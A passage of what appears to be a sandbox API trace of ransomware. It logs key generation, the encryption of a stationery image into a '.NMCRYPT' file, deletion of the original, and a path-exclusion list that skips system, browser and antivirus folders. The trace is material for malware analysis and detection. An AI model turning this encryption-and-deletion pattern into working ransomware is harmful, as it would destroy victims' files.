(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.089] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.089] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.090] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x292404c | out: phHash=0x292404c) returned 1 [0165.090] CryptHashData (hHash=0x9ad638, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.090] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad638, dwFlags=0x4, phKey=0x2924050 | out: phKey=0x2924050*=0x9ad678) returned 1 [0165.090] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0165.090] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0165.090] wcslen (_String="\\\\?\\") returned 0x4 [0165.090] CryptDuplicateKey (in: hKey=0x9ad678, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad478) returned 1 [0165.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd68 [0165.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd6c [0165.091] GetFileSizeEx (in: hFile=0xd6c, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=1920) returned 1 [0165.091] WriteFile (in: hFile=0xd68, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0165.091] ReadFile (in: hFile=0xd6c, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.092] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.092] GetLastError () returned 0x0 [0165.092] WriteFile (in: hFile=0xd68, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.226] ReadFile (in: hFile=0xd6c, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.226] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.226] GetLastError () returned 0x0 [0165.226] WriteFile (in: hFile=0xd68, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.226] ReadFile (in: hFile=0xd6c, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.226] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.226] GetLastError () returned 0x0 [0165.226] WriteFile (in: hFile=0xd68, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.226] ReadFile (in: hFile=0xd6c, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.226] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.226] GetLastError () returned 0x0 [0165.226] WriteFile (in: hFile=0xd68, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.226] ReadFile (in: hFile=0xd6c, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.226] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.226] GetLastError () returned 0x0 [0165.226] WriteFile (in: hFile=0xd68, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.226] ReadFile (in: hFile=0xd6c, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.226] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.226] GetLastError () returned 0x0 [0165.226] WriteFile (in: hFile=0xd68, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.226] ReadFile (in: hFile=0xd6c, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.227] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.227] GetLastError () returned 0x0 [0165.227] WriteFile (in: hFile=0xd68, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.227] ReadFile (in: hFile=0xd6c, lpBuffer=0x2895990, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x80, lpOverlapped=0x0) returned 1 [0165.227] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x80, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x90) returned 1 [0165.227] GetLastError () returned 0x0 [0165.227] WriteFile (in: hFile=0xd68, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x90, lpOverlapped=0x0) returned 1 [0165.227] ReadFile (in: hFile=0xd6c, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0165.227] WriteFile (in: hFile=0xd68, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0165.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg")) returned 0x20 [0165.227] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg", dwFileAttributes=0x20) returned 0 [0165.227] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 1 [0165.227] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg")) returned 0 [0165.228] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" [0165.228] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0165.228] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF8E9.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf8e9.tmp")) returned 0xf8e9 [0165.241] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF8E9.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf8e9.tmp"), dwFlags=0x1) returned 0 [0165.241] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF8E9.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf8e9.tmp")) returned 1 [0165.241] CryptDestroyKey (hKey=0x9ad478) returned 1 [0165.241] wcslen (_String="OK") returned 0x2 [0165.241] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.241] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.241] CryptDestroyKey (hKey=0x9ad678) returned 1 [0165.242] CryptDestroyHash (hHash=0x9ad638) returned 1 [0165.242] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0165.242] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*NMCRYPT") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*Recovers your files.html") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*.exe") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*.dll") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*.lnk") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*.bat") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*.ini") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*.msi") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*.scf") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*pagefile.sys*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*AppData*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*\\winrar\\*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*\\java\\*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*\\windows\\*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*\\ESET\\*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*\\AVG\\*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*Atheros*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*Realtek*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*bootmgr*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*boot*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*boot*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*IO.SYS*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*ntldr*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*chrome*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*opera*") returned 0 [0165.242] PathMatchSpecW (pszFile="Sand_Paper.jpg", pszSpec="*firefox*") returned 0 [0165.242] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg", pszSpec="*") returned 1 [0165.242] strlen (_Str="NMoreira") returned 0x8 [0165.242] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.242] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.242] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.242] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.242] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 